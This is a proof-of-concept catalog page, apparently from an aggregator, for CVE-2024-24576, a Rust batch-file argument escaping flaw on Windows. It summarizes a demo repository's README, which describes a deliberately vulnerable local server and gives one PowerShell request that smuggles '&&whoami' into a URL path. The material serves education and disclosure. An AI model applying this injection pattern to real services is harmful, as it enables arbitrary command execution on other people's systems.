CVE-2024-24576 PoC — Rust 安全漏洞

Source

https://github.com/corysabol/batbadbut-demo

Associated Vulnerability

Title:Rust 安全漏洞 (CVE-2024-24576)
Description:Rust是美国Mozilla基金会的一款通用、编译型编程语言。 Rust 1.77.2之前版本存在安全漏洞，该漏洞源于没有正确转义Windows上批处理文件的参数，攻击者可以通过绕过转义来执行任意shell命令。

Description

This is a simple demo for the BadBatBut vulnerability CVE-2024-24576

Readme

# CVE-2024-24576 BadBatBut Demo

This is a simple demo for the BadBatBut vulnerability CVE-2024-24576.

More information here - https://blog.rust-lang.org/2024/04/09/cve-2024-24576.html.

This repository is for educational purposes only.

## Usage

### Pre-built binary
- Get the pre-built windows binary from the [releases](https://github.com/corysabol/batbadbut-demo/releases).
- Run the server binary `./badbatbut-demo.exe`

### Build from source
- Clone this repo
- Run the code on a Windows box `cargo run`

### Exploit

The server exposes an endpoint `/server_info/{server}` on `http://localhost:9999` which runs a .bat file to fetch server info.
The vulnerability can be exploited by sending a GET request to this endpoint like follows:

```
Write-Output (Invoke-WebRequest -Uri "http://localhost:9999/server_info/localhost&&whoami").Content
```

File Snapshot


 [4.0K]  /data/pocs/34c27e5190d53d410b0ae9154a376990ea58bbb7
├── [ 35K]  Cargo.lock
├── [ 208]  Cargo.toml
├── [ 879]  README.md
├── [  90]  serverinfo.bat
└── [4.0K]  src
    └── [1.4K]  main.rs

1 directory, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!